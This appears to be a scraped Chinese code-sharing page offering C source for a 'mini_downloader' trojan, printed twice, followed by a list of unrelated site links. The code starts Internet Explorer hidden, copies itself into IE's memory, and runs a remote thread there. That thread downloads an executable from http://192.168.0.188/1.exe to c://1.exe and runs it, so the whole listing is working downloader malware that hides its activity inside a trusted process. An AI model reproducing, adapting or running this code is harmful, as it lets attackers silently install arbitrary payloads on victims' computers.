插入IE进程的下载者源代码
来源:互联网 发布:乐动力数据恢复 编辑:程序博客网 时间:2024/05/21 17:19
/*
"mini_downloader"
code bykardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/OPT:NOWIN98") //取消这几行的注释,编译出的文件只有2K大小
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon;
void download() //注入使用的下载函数
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,"http://192.168.0.188/1.exe","c://1.exe",0, NULL);
SHELLRUN(0,"open","c://1.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //主函数
{
//1.得到IE路径,并运行
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
//strcat(iename,"windows//notepad.EXE");
WinExec(iename,SW_HIDE);
Sleep(2000);
//2.得到 IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.分配内存
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.写内存,创建线程
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
//5.关闭对象
CloseHandle(processhandle);
Sleep(5000);
return;
};
"mini_downloader"
code bykardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/OPT:NOWIN98") //取消这几行的注释,编译出的文件只有2K大小
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon;
void download() //注入使用的下载函数
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,"http://192.168.0.188/1.exe","c://1.exe",0, NULL);
SHELLRUN(0,"open","c://1.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //主函数
{
//1.得到IE路径,并运行
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files//Internet Explorer//IEXPLORE.EXE");
//strcat(iename,"windows//notepad.EXE");
WinExec(iename,SW_HIDE);
Sleep(2000);
//2.得到 IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.分配内存
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.写内存,创建线程
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
//5.关闭对象
CloseHandle(processhandle);
Sleep(5000);
return;
};
- 插入IE进程的下载者源代码
- 无Dll插入进程,下载者VC源代码
- 无Dll插入进程、下载者VC源代码
- 无dll插入进程,下载者vc源代码
- 插入自己到IE进程
- 插入自己到IE进程
- 把自身插入到IE进程里的代码
- 把自身插入到IE进程里的代码
- 把自己插入到IE进程中
- IE的进程模型
- 蠕虫功能的下载者源代码
- android源代码的下载
- Android源代码的下载
- csdn插入源代码的测试
- 对网上“dll插入系统进程的源码!算是写木马的经典了”文章所附源代码的修改
- 用VIM做IE源代码的编辑器
- 获得进程快照的源代码
- Notepad++的源代码的下载
- VI资料收集
- Java(swt+jface) 开发的Eclipse插件下载
- 一个研究生毕业以后的人生规划
- 网络工程师学习笔记(3)
- 感谢
- 插入IE进程的下载者源代码
- 在测试的过程中的效率
- 隐藏重复回帖的脚本
- 一些常用的正则表达式
- PowerDesigner中的反向工程
- 网络工程师学习笔记(4)
- 发布PowerDesigner11.0中文教程
- system resource monitor
- 网络工程师学习笔记(5)